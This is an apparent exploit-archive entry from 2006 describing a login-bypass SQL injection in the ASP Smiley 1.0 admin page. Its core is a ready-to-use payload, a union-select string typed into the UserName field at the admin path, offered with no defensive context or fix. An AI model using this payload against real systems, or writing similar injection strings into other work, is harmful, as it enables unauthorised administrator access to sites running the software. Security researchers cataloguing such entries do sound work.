id: 1164
date: 11/14/2006
title: ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability
author: ajann
cves: 

=====================================================================
ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability
=====================================================================



*******************************************************************************
# Title  :  ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann
*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0,0,0,0,0,0,0 from categories


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!




#  0day.today [2023-03-26]  #